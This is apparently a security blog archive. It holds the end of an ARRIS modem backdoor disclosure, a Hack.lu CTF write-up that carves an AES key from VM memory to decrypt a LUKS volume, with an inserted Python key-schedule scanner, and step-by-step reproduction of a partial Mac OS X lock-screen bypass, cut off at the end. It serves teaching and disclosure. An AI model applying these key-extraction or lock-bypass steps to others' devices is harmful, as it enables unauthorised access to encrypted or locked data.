I'm really relieved knowing that <a href="https://twitter.com/todb/status/648956328292057088">those evil guys from Metasploit</a> won't be able to reverse this in a timely manner.<br /><div><br /></div><br /><b>Vulnerability, Disclosure and Marketing</b><br /><br />Of course, we need a logo so the media can report on this with fancy graphs and vendors can hand out customized t-shirts at Blackhat.<br /><br />What I like most about <a href="https://twitter.com/lcamtuf">lcamtuf</a> is how visionary he is. While people were still writing dumb fuzzers, he <strike>wrote AFL</strike>&nbsp;performed a detailed <a href="https://lcamtuf.blogspot.com/2015/01/technical-analysis-of-qualys-ghost.html">Technical analysis of Qualys' GHOST</a>. Based on his analysis, I hired a couple of marketing specialists to find out the best way to disclose the ARRIS backdoor.<br /><br />What do we have here?<br /><br />- Multiple backdoors allowing full remote access to ARRIS cable modems<br />- An access key that is generated from the cable modem's serial number<br /><br />After careful analysis, the marketing committee advised w00tsec members to write a <a href="https://en.wikipedia.org/wiki/Keygen">Keygen</a>. In order to write a Keygen, we need leet ASCII art and a cool chiptune.
The chosen font was <a href="http://sourceforge.net/p/ansiconverter/blog/2014/07/thedraw-fonts-collection-revamp-and-extension/">ROYAFNT1.TDF</a>, from the legendary artist <a href="https://en.wikipedia.org/wiki/Superior_Art_Creations">Roy/SAC</a>,&nbsp;and the chiptune is <a href="https://www.youtube.com/watch?v=Syc2NnPNnZs">Toilet Story 5</a>, by <a href="http://modarchive.org/index.php?request=view_profile&amp;query=68760">Ghidorah</a>.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-XS_jwjNWqpo/VkqONoRel3I/AAAAAAAABQU/9LOJWamfAnY/s1600/run2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="444" src="http://4.bp.blogspot.com/-XS_jwjNWqpo/VkqONoRel3I/AAAAAAAABQU/9LOJWamfAnY/s640/run2.png" width="640" /></a></div><br /><br />Here's the PoC (make sure you turn the sound on):<br /><br /><br /><div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/pmKd69-KyhQ/0.jpg" frameborder="0" height="400" src="https://www.youtube.com/embed/pmKd69-KyhQ?feature=player_embedded" width="660"></iframe></div><br /><br /><b>Conclusion</b><br /><b><br /></b>I reported these flaws to <a href="https://www.cert.org/vulnerability-analysis/">CERT/CC</a> on 2015-09-13, but we didn't receive much feedback from the vendor.&nbsp;<a href="https://www.cert.org/vulnerability-analysis/">CERT/CC&nbsp;</a>was very helpful and responsive (10/10 would disclose again!).
I was asked not to release the&nbsp;PoCs immediately, so I'm going to wait for the vendor to "fix" the issue.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-ur0HSoXiBcE/VNff-8DqvQI/AAAAAAAAA40/pxdqS4lQ9SY/s1600/tweet2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="http://3.bp.blogspot.com/-ur0HSoXiBcE/VNff-8DqvQI/AAAAAAAAA40/pxdqS4lQ9SY/s400/tweet2.png" width="400" /></a></div><br />CERT/CC set a <a href="https://www.cert.org/vulnerability-analysis/vul-disclosure.cfm">disclosure policy of 45 days</a> long ago. They waited more than 65 days for ARRIS to "fix" it, but ARRIS didn't remove the backdoors in a timely manner. Someone needs to update the Responsible Disclosure RFC and include a note saying that vendors lose disclosure points whenever they plant a backdoor on a device (ARRIS modems have a third backdoor too, check the <a href="http://console-cowboys.blogspot.com/2014/09/arris-cable-modem-backdoor-im.html">ConsoleCowboys Blog</a>).<br /><br />I'm pretty sure bad guys have been exploiting flaws on these devices for some time (just search for <a href="https://twitter.com/search?q=arris%20dns&amp;src=typd">ARRIS DNS on Twitter</a>, for example). We need more people bypassing EULAs and reversing end-user software and firmware. If you haven't heard about <a href="http://firmware.re/">Firmware.RE</a>, check them out right now.
A broader view of firmware is not only beneficial but necessary to discover new vulnerabilities and backdoors, correlating different device families and showing how vulnerabilities reappear across different products.<br /><br />To all the vendors out there, I would like to finish this post by quoting <a href="https://twitter.com/daveaitel">@daveaitel</a>:<br /><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://www.csoonline.com/article/2997254/security-industry/hacked-opinions-the-legalities-of-hacking-dave-aitel.html"><img border="0" height="167" src="http://4.bp.blogspot.com/-409Y3m5XyRU/VkqNAtdepYI/AAAAAAAABQI/uz0V3u6U1IU/s400/knowing.png" width="400" /></a></div><br />Bernardo Rodrigues<br /><br /><b>Hack.lu 2015 CTF Write Up: Dr. Bob (Forensic 150)</b><br />Posted 2015-10-22, updated 2015-12-09<br /><br /><a href="http://2015.hack.lu/ctf/">Hack.lu 2015 CTF</a>&nbsp;was organised by <a href="https://twitter.com/fluxfingers">fluxfingers</a>&nbsp;during October 20-22. It's one of the coolest CTFs around; the only drawback is that it runs during week days (hey guys, patch this for the next years). My team <a href="https://ctftime.org/team/10288">TheGoonies</a> ranked #59th, which is not bad considering we only played part-time.<br /><br />The task Dr. Bob was the one I found most interesting as it included disk forensics, memory forensics and basic crypto tasks.<br /><br /><b>Task: Dr. Bob&nbsp;(Forensic 150)</b><br /><br /><div class="code">There are elections at the moment for the representative of the students and the winner will be announced tomorrow by the head of elections Dr. Bob. The local schoolyard gang is gambling on the winner and you could really use that extra cash. Luckily, you are able to hack into the mainframe of the school and get a copy of the virtual machine that is used by Dr. Bob to store the results. The desired information is in the file /home/bob/flag.txt, easy as that.</div><div><br /></div><div><div>Download: <a href="https://school.fluxfingers.net/static/chals/dr_bob_e22538fa166acecc68fa17ac148dcbe2.tar.gz">dr_bob_e22538fa166acecc68fa17ac148dcbe2.tar.gz</a></div></div><div><br /></div>The file provided is a VirtualBox image in a saved state. According to the challenge instructions, we have to retrieve the flag from the user's home folder. The VM starts at a login prompt of what seems to be a Linux distro.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-E7EJcLEF4Os/VihFkIXg5MI/AAAAAAAABLI/vSuJpCZbaeM/s1600/distro.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="262" src="http://1.bp.blogspot.com/-E7EJcLEF4Os/VihFkIXg5MI/AAAAAAAABLI/vSuJpCZbaeM/s400/distro.PNG" width="400" /></a></div><br />The easiest route here is to convert the VDI image to raw, mount it and extract the flag from the home folder.
VirtualBox has a builtin tool to convert VDI to raw and it's as simple as:<br /><br /><div class="code">C:\Program Files\Oracle\VirtualBox\VBoxManage.exe internalcommands converttoraw c:\ctf\home\dr_bob\.VirtualBox\Safe\Safe.vdi c:\ctf\safe.dd</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-ERN2q3AU0cA/VihGvf6yMTI/AAAAAAAABLk/CAUpRfOyQxA/s1600/dd.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="85" src="http://3.bp.blogspot.com/-ERN2q3AU0cA/VihGvf6yMTI/AAAAAAAABLk/CAUpRfOyQxA/s400/dd.PNG" width="400" /></a></div><br />Let's identify the partitions in the raw image and mount it on the host:<br /><div class="code">sudo fdisk -lu safe.dd </div><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-z4EQ8YJU8rU/VihGhhyUhnI/AAAAAAAABLc/AOa4BL-viMM/s1600/Screenshot-Terminal.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="141" src="http://4.bp.blogspot.com/-z4EQ8YJU8rU/VihGhhyUhnI/AAAAAAAABLc/AOa4BL-viMM/s400/Screenshot-Terminal.png" width="400" /></a></div><br /><div class="code">sudo losetup -o 1048576 /dev/loop0 safe.dd</div><div class="code">sudo lvmdiskscan</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-xDUtH-eC9Gc/VihHS8QNV0I/AAAAAAAABLs/CSLG13SrJcg/s1600/Screenshot-Terminal-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="141" src="http://4.bp.blogspot.com/-xDUtH-eC9Gc/VihHS8QNV0I/AAAAAAAABLs/CSLG13SrJcg/s400/Screenshot-Terminal-1.png" width="400" /></a></div><br />The losetup offset is the partition's start sector multiplied by the 512-byte sector size (2048 * 512 = 1048576), both taken from the fdisk output. There are two interesting logical volumes, /dev/vg/root and /dev/vg/home, so let's 1 - mount the home volume, 2 - grab the flag and 3 - PROFIT!!!<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-ISxFDyWXF4s/VihHvRpuuKI/AAAAAAAABL0/2Yfvcy2Wkvc/s1600/disk.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://2.bp.blogspot.com/-ISxFDyWXF4s/VihHvRpuuKI/AAAAAAAABL0/2Yfvcy2Wkvc/s320/disk.png" width="320" /></a></div><br />Oh noes, the disk is encrypted... I couldn't find any useful data on the root device (/dev/vg/root). I tried to crack some local password hashes but didn't get anything, and logs/history files didn't reveal any secrets. Time to unleash some CSI skills and perform live memory forensics.<br /><br /><b><br /></b><b>Memory Forensics: Rekall</b><br /><br />Unlike VMware virtual machines, VirtualBox does not offer an easy-to-use memory dump (as far as I know). What do we do now? It's time to perform <a href="http://www.rekall-forensic.com/posts/2014-10-03-vms.html">VM introspection with Rekall</a>.<br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://3.bp.blogspot.com/-gLw0EQIzO44/Vig5ZlnBwRI/AAAAAAAABK4/5ngcJgMvdmc/s1600/inception.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="210" src="http://3.bp.blogspot.com/-gLw0EQIzO44/Vig5ZlnBwRI/AAAAAAAABK4/5ngcJgMvdmc/s400/inception.jpg" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Memory Analysis Inception</td></tr></tbody></table>Rekall is the first memory framework to support transparent introspection of VMs with any host-guest OS combination, independent of the virtualization software layer.<br /><br /><b><br /></b><b>Building the Profile</b><br /><b><br /></b>Linux support in Rekall requires a profile tailored to the running kernel as well as the System.map file. The profile file contains all the debugging symbols extracted into Rekall's standard profile format.
To generate this file, it is necessary to build a kernel module with debugging symbols enabled and then parse the DWARF debugging symbols.<br /><br />The operating system is Debian 7.9 i686 with the 3.2.0-4-486 kernel.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-TXY2lx_4ADM/VihM0aqY4sI/AAAAAAAABME/_5bOeSwWsgQ/s1600/deb.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="122" src="http://1.bp.blogspot.com/-TXY2lx_4ADM/VihM0aqY4sI/AAAAAAAABME/_5bOeSwWsgQ/s400/deb.png" width="400" /></a></div><br />The <a href="https://github.com/google/rekall/tree/master/tools/linux">Linux Guide</a> from the <a href="https://github.com/google/rekall/tree/master/tools/linux">rekall repository</a> is pretty straightforward. I downloaded a <a href="http://cdimage.debian.org/cdimage/archive/7.9.0/i386/iso-dvd/">Debian 7.9 i386 ISO</a>, installed it on a clean system, installed the kernel headers matching the target VM and built the respective profiles. I mirrored them here:<br /><div><ul><li><a href="https://github.com/bmaia/rekall-profiles">https://github.com/bmaia/rekall-profiles</a></li></ul></div><div><b><br /></b></div><div><b>Memory Analysis Inception</b></div><br />Now that we have the proper profile, we can run VirtualBox, start the VM and perform live forensics on the guest machine from the host.<br /><br />The <a href="http://www.rekall-forensic.com/docs/Manual/Plugins/General/VmScan.html">vmscan plugin</a> scans the physical memory attempting to find hypervisors and group them together logically as virtual machines.<br /><br />It's possible to run plugins on any VM by using the --ept (<a href="http://www.rekall-forensic.com/posts/2014-10-03-vms.html">Extended Page Tables</a>) parameter on the command line.
To run a Rekall plugin on a VM that vmscan found, invoke Rekall as you normally would, but add --ept EPT_VALUE as a parameter.<br /><br /><div class="code">rekal -f \\.\pmem vmscan --live</div><div class="code">rekal.exe -f \\.\pmem --profile Debian-3.2.0-4-486.zip --ept 0x1ECC0701E</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-8Q412GTpnDA/VihY3h-AnRI/AAAAAAAABMg/-Mw6c_dCUqM/s1600/success.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="280" src="http://3.bp.blogspot.com/-8Q412GTpnDA/VihY3h-AnRI/AAAAAAAABMg/-Mw6c_dCUqM/s400/success.PNG" width="400" /></a></div><br />I tried the basic <a href="http://www.rekall-forensic.com/docs/Manual/Plugins/Linux/">plugins that support Linux analysis</a>, but none of them revealed the secrets necessary to decrypt the disk.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-4l8hqQDOUz0/VihadQUZrAI/AAAAAAAABM0/Bj21f-HG9d4/s1600/netstat.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="292" src="http://3.bp.blogspot.com/-4l8hqQDOUz0/VihadQUZrAI/AAAAAAAABM0/Bj21f-HG9d4/s400/netstat.PNG" width="400" /></a></div><br />After some time I decided to take a different approach: <a href="http://www.rekall-forensic.com/docs/Manual/Plugins/General/ImageCopy.html">dump the full memory</a> of the guest VM and carve it for secrets.<br /><br /><div class="code">imagecopy output_image='memdump.raw'</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-U1TFBJheOD0/VihdFY2x45I/AAAAAAAABNA/ipOLBGyx6ZI/s1600/memdump.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="150" src="http://4.bp.blogspot.com/-U1TFBJheOD0/VihdFY2x45I/AAAAAAAABNA/ipOLBGyx6ZI/s400/memdump.PNG" width="400" /></a></div><br /><b><br /></b><b>Extracting AES Keys from the Memory Dump</b><br /><br />You can use tools like <a href="https://github.com/simsong/bulk_extractor">bulk_extractor</a> and <a href="http://jessekornblum.livejournal.com/269749.html">findaes</a> to extract AES keys from memory dumps. These programs work by scanning the image and discarding everything that is not a valid AES key schedule: the kernel's AES implementation keeps the expanded round keys in memory next to the key, and since the expansion is a deterministic function of the key, a 16-byte window that is followed by its own expansion is almost certainly a key in use.<br /><br /><div class="code">./findaes memdump.raw</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-dRCcBuIghss/VihexUwvL7I/AAAAAAAABNM/qnhpIEJWarA/s1600/findaes.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="83" src="http://1.bp.blogspot.com/-dRCcBuIghss/VihexUwvL7I/AAAAAAAABNM/qnhpIEJWarA/s400/findaes.png" width="400" /></a></div><br />The tool found an AES-128 key, and I now needed to recreate this scenario in a lab to make sure that a key found this way really is the encryption master key.&nbsp;I set up an encrypted volume on a Debian installation and dumped its master key using cryptsetup:<br /><br /><div class="code">cryptsetup luksDump --dump-master-key /dev/sda5</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-V2eRoQQtilo/Vihf8lQQyRI/AAAAAAAABNY/hmFDexV1XiQ/s1600/b1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="268" src="http://1.bp.blogspot.com/-V2eRoQQtilo/Vihf8lQQyRI/AAAAAAAABNY/hmFDexV1XiQ/s400/b1.png" width="400" /></a></div><br />After that, I dumped the lab system's memory and used bulk_extractor to search for AES keys:<br /><br /><div class="code">bulk_extractor memdump.raw</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-5zIXQVR9N6g/VihgSxcTWDI/AAAAAAAABNg/GPI_2t_Pujs/s1600/b2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="173" src="http://1.bp.blogspot.com/-5zIXQVR9N6g/VihgSxcTWDI/AAAAAAAABNg/GPI_2t_Pujs/s400/b2.png" width="400" /></a></div><br />The AES-256 key carved from the lab dump matches the master key from luksDump, which validates the approach and brings us to the final step.<br /><br /><b><br /></b><b>Decrypting the LUKS volume using the Master Key</b><br /><br />Now that we have the AES key, all we need to do is follow this guide -&nbsp;<a href="http://b87.nl/cryptsetup-and-the-master-key">Cryptsetup and the master key</a>&nbsp;- and decrypt '/dev/vg/home'. There was no straightforward command-line way to open the volume with just the master key, so everything is kind of hackish (you blank the existing header and create a new one that wraps the known key under a passphrase of your choice).<br /><br /><div class="code">sudo losetup -o 1048576 /dev/loop1 safe.dd</div><div class="code">cryptsetup -v luksDump /dev/vg/home</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-EgySSSQ7PWQ/Vihjvd-L49I/AAAAAAAABNs/0yj5HkthMkM/s1600/Screenshot-Terminal-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="272" src="http://2.bp.blogspot.com/-EgySSSQ7PWQ/Vihjvd-L49I/AAAAAAAABNs/0yj5HkthMkM/s400/Screenshot-Terminal-2.png" width="400" /></a></div><br />The master key (MK) has 128 bits, the same size as the AES-128 key carved from memory, which is a good sign.
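Before the header surgery, here is the key-schedule check that findaes and bulk_extractor perform in the previous section, as an added example written for this page (not those tools' code): AES key expansion per FIPS-197, generalised to 128/192/256-bit keys since the lab run above carved an AES-256 key, plus a scanner that reports every window of a buffer that is followed by its own expansion. The sample "dump" is constructed: random filler with the 16-byte master key from this write-up (and its schedule, as the kernel would hold it) planted at a known offset. The S-box is derived arithmetically rather than typed in, and the check values in the test are FIPS-197's published expansion vectors.

```python
"""AES key-schedule scanner (added example; not findaes/bulk_extractor code).

A live AES context holds the expanded round keys right after the key. The
expansion is deterministic, so any 16/24/32-byte window followed by its own
expansion is a key in use. This is what findaes and bulk_extractor look for.
"""
import random


def _gf_mul(a: int, b: int) -> int:
    """Multiply in GF(2^8) modulo the AES polynomial x^8+x^4+x^3+x+1."""
    p = 0
    for _ in range(8):
        if b & 1:
            p ^= a
        carry = a & 0x80
        a = (a << 1) & 0xFF
        if carry:
            a ^= 0x1B
        b >>= 1
    return p


def _build_sbox():
    """Derive the S-box: multiplicative inverse in GF(2^8), then the affine map."""
    sbox = []
    for x in range(256):
        inv = 0
        if x:
            inv = 1
            for _ in range(254):  # x^254 == x^-1 in the multiplicative group of GF(2^8)
                inv = _gf_mul(inv, x)
        s = inv
        for i in range(1, 5):  # s ^= rotl(inv, 1..4)
            s ^= ((inv << i) | (inv >> (8 - i))) & 0xFF
        sbox.append(s ^ 0x63)
    return sbox


SBOX = _build_sbox()
RCON = [0x00, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36]


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _next_word(w, i, nk):
    """Word i of the schedule from the previous words (FIPS-197 section 5.2)."""
    temp = w[i - 1]
    if i % nk == 0:
        rotated = temp[1:] + temp[:1]
        temp = _xor(bytes(SBOX[b] for b in rotated), bytes([RCON[i // nk], 0, 0, 0]))
    elif nk > 6 and i % 4 == 0:  # extra SubWord step for AES-256
        temp = bytes(SBOX[b] for b in temp)
    return _xor(w[i - nk], temp)


def expand_key(key: bytes) -> bytes:
    """Full key schedule: 176, 208 or 240 bytes for 128/192/256-bit keys."""
    nk = len(key) // 4
    if len(key) % 4 or nk not in (4, 6, 8):
        raise ValueError("key must be 16, 24 or 32 bytes")
    w = [key[4 * i:4 * i + 4] for i in range(nk)]
    for i in range(nk, 4 * (nk + 7)):  # 4 * (Nr + 1) words, Nr = nk + 6
        w.append(_next_word(w, i, nk))
    return b"".join(w)


def find_aes_keys(buf: bytes, key_len: int = 16):
    """Return [(offset, key_hex)] for every window of buf followed by its own expansion."""
    nk = key_len // 4
    sched_len = 16 * (nk + 7)
    hits = []
    for off in range(len(buf) - sched_len + 1):
        w = [buf[off + 4 * j:off + 4 * j + 4] for j in range(nk)]
        # Cheap filter on the first expanded word; full schedule only on a match.
        if _next_word(w, nk, nk) != buf[off + key_len:off + key_len + 4]:
            continue
        key = buf[off:off + key_len]
        if expand_key(key) == buf[off:off + sched_len]:
            hits.append((off, key.hex()))
    return hits


# Constructed sample "dump": random filler with the write-up's master key and
# its schedule planted at a known offset (no real memory image is used).
SAMPLE_KEY = bytes.fromhex("1fab015c1e3df9eac8728f65d3d16646")
SAMPLE_OFFSET = 3000


def build_sample_dump(size: int = 8192, seed: int = 7) -> bytes:
    rng = random.Random(seed)
    filler = bytearray(rng.getrandbits(8) for _ in range(size))
    sched = expand_key(SAMPLE_KEY)
    filler[SAMPLE_OFFSET:SAMPLE_OFFSET + len(sched)] = sched
    return bytes(filler)


if __name__ == "__main__":
    for off, key in find_aes_keys(build_sample_dump()):
        print(f"AES-128 key schedule at offset {off:#x}: key {key}")
```

Pure Python is fine for confirming the idea on a few megabytes; for a full guest memory image use findaes or bulk_extractor, which do the same scan in C. A hit only tells you a key schedule was resident, not which volume it belongs to, which is why the write-up cross-checks against luksDump.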
The payload offset is 2048 and we need to do some basic math here to get the LUKS header size: 2048 * 512 / 1024 = 1024 KiB, i.e. 1 MiB (fdisk -l shows that the sector size is 512 bytes).<br /><br />We now proceed to write a new LUKS header on the device using the extracted MK, assigning a new passphrase:<br /><br /><div class="code">dd if=/dev/vg/home of=test.img<br />hexdump -C -n 80 test.img<br />dd if=/dev/zero of=test.img conv=notrunc bs=1024 count=1<br />hexdump -C -v -n 80 test.img<br />echo 1fab015c1e3df9eac8728f65d3d16646 | xxd -r -p &gt; key.bin</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-ueeK2gMcQcA/Vihn5E77S1I/AAAAAAAABN4/t-Nhy3K8nUA/s1600/Screenshot-Terminal-3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="272" src="http://2.bp.blogspot.com/-ueeK2gMcQcA/Vihn5E77S1I/AAAAAAAABN4/t-Nhy3K8nUA/s400/Screenshot-Terminal-3.png" width="400" /></a></div><br /><div class="code">cryptsetup luksFormat --verify-passphrase --cipher=aes-ecb --hash=sha1 --key-size=128 --master-key-file=key.bin test.img</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-751GFVP6PSg/VihoTIv4wwI/AAAAAAAABOA/mptXY4WDEf4/s1600/Screenshot-Terminal-4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="135" src="http://1.bp.blogspot.com/-751GFVP6PSg/VihoTIv4wwI/AAAAAAAABOA/mptXY4WDEf4/s400/Screenshot-Terminal-4.png" width="400" /></a></div><br />They tried to hide the flag from "/bin/cat" using the carriage return character (0x0D), but hexdump and Pluma had no problems displaying it:<br /><br /><div class="separator" style="clear: both; text-align: left;"><a href="http://4.bp.blogspot.com/-6YhHccbV4Mc/VihpS_TteEI/AAAAAAAABOU/Txdc9fMQ-tg/s1600/final.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="352" src="http://4.bp.blogspot.com/-6YhHccbV4Mc/VihpS_TteEI/AAAAAAAABOU/Txdc9fMQ-tg/s400/final.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-5TSWYFfQZrs/VihoaLEn2nI/AAAAAAAABOM/bJLexLLGoVc/s1600/Screenshot-Terminal-5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="144" src="http://3.bp.blogspot.com/-5TSWYFfQZrs/VihoaLEn2nI/AAAAAAAABOM/bJLexLLGoVc/s400/Screenshot-Terminal-5.png" width="400" /></a></div><br /><br />Flag:&nbsp;<b>flag{v0t3_f0r_p3dr0}</b><br /><br /><br /><b>Update 1:&nbsp;</b><a href="https://twitter.com/rbaranyi">@rbaranyi</a> and <a href="https://plus.google.com/107016163963660206221">David Berard</a> pointed out that replacing '/etc/shadow', logging in with the known password and then using 'strings /dev/lvm' would be easier. That's true, but that wouldn't involve any kind of <a href="http://cdn.meme.am/instances/500x/65198356.jpg">memory inception</a>.<br /><br /><b>Update 2:&nbsp;</b><a href="https://plus.google.com/107016163963660206221">David Berard</a>&nbsp;pointed out that <a href="https://gitlab.com/cryptsetup/cryptsetup/wikis/FrequentlyAskedQuestions#6-backup-and-data-recovery">newer 'cryptsetup' offers an option to set a new passphrase using the master key</a>: 'cryptsetup luksAddKey --master-key-file=&lt;master-key-file&gt; &lt;luks device&gt;'<br /><br /><b>Update 3:</b> According to the <a href="https://github.com/xwings/tuya/tree/master/ctf2015/hack.lu/drbob150">writeup from CLGT</a>, you can also dump VirtualBox RAM using this handy command: 'VBoxManage debugvm SafeClone dumpvmcore --filename=getthekey'<br /><br /><b>Update 4:</b> Some teams used the <a href="https://github.com/c1fe/dm_dump/">dm_dump</a> volatility plugin: it identifies disks on the target system which were mounted using the device-mapper framework.&nbsp;The output of this plugin gives you the arguments to pass to the dmsetup command to remount the original unencrypted file system on a different machine.<br /><br />Bernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.com4tag:blogger.com,1999:blog-3296471108082693838.post-14134944204402547312015-10-07T11:18:00.001-03:002015-10-07T11:26:14.058-03:00Mac OS X 10.11 Partial Lock Screen BypassLock screen bypasses are becoming mainstream. 
The most notable recent bypasses are&nbsp;<a href="https://bugs.launchpad.net/ubuntu/+source/unity/+bug/1308572">the one from Ubuntu 14.04</a>&nbsp;(hold Enter, the lock screen crashes, the computer is unlocked) and&nbsp;<a href="http://sites.utexas.edu/iso/2015/09/15/android-5-lockscreen-bypass/">the one from Android 5.x</a>&nbsp;(input large strings in the password field, crash the lock screen, land on the home screen).<br /><br />Many respected researchers have found and published something about this class of bugs and this blog is no different: this post describes a <strike>completely useless</strike> <a href="https://www.youtube.com/watch?v=h05YfP_8UsU">super serious</a>&nbsp;vulnerability affecting Mac OS X 10.11 and earlier.<br /><br /><b>Mac OS X 10.11 Partial Lock Screen Bypass</b><br /><br />Mac OS X 10.11 (and probably older versions) is vulnerable to a partial lock screen bypass. This is not a *complete* lock screen bypass as you won't be able to freely interact with the Desktop (as far as I know). Here are the steps to reproduce this bug:<br /><br />1 - Hit the&nbsp;<b>Exposé Key (F3)</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-PfrZ39PtqXc/VhSsJVr0aWI/AAAAAAAABKE/l20PkwPbtJc/s1600/Screen%2BShot%2B2015-10-07%2Bat%2B1.43.38%2BAM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://2.bp.blogspot.com/-PfrZ39PtqXc/VhSsJVr0aWI/AAAAAAAABKE/l20PkwPbtJc/s400/Screen%2BShot%2B2015-10-07%2Bat%2B1.43.38%2BAM.png" width="400" /></a></div><br /><br />2 - Click on any window and keep holding it<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-yFiDdnA7yoI/VhSsQxPJ6TI/AAAAAAAABKM/A7pxznJbmXA/s1600/Screen%2BShot%2B2015-10-07%2Bat%2B1.43.56%2BAM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://3.bp.blogspot.com/-yFiDdnA7yoI/VhSsQxPJ6TI/AAAAAAAABKM/A7pxznJbmXA/s400/Screen%2BShot%2B2015-10-07%2Bat%2B1.43.56%2BAM.png" width="400" /></a></div><br /><br />3 - Keep holding the left mouse button and lock the screen using <b>Command + Option + Eject </b>(hold all these keys together for some time)<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-pMmsIbsTS2A/VhSsZjNjOkI/AAAAAAAABKU/duYxcRsqC7c/s1600/Screen%2BShot%2B2015-10-07%2Bat%2B1.48.54%2BAM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="223" src="http://3.bp.blogspot.com/-pMmsIbsTS2A/VhSsZjNjOkI/AAAAAAAABKU/duYxcRsqC7c/s400/Screen%2BShot%2B2015-10-07%2Bat%2B1.48.54%2BAM.png" width="400" /></a></div><br /><br />That's it, now the lock screen has an "extra layer" with the miniaturised desktop windows. 
If you move the mouse cursor over the correct application position and hit the <b>Space Key</b>, a bigger window will be displayed.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/--W3j0d0gQGA/VhSskspDXKI/AAAAAAAABKc/xoyP-D_5d30/s1600/Screen%2BShot%2B2015-10-07%2Bat%2B2.08.54%2BAM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="172" src="http://1.bp.blogspot.com/--W3j0d0gQGA/VhSskspDXKI/AAAAAAAABKc/xoyP-D_5d30/s320/Screen%2BShot%2B2015-10-07%2Bat%2B2.08.54%2BAM.png" width="320" /></a></div><br /><br />You can watch Youtube videos and interact with media players (Quicktime, Spotify etc) using the media control keys. You can't interact directly with the app: if you left-click on the windows or hit Enter, the lock screen takes over that invisible layer.<br /><br />Proof-of-concept - Mac OS X 10.11:<br /><br /><div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/lDkJ0XtIrxk/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/lDkJ0XtIrxk?feature=player_embedded" width="320"></iframe></div><br />If Youtube is blocking the video in your country, watch it here:<br /><br /><div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/yQ8SYyP4-Uw/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/yQ8SYyP4-Uw?feature=player_embedded" width="320"></iframe></div><br /><br />If you are a serious tech journalist 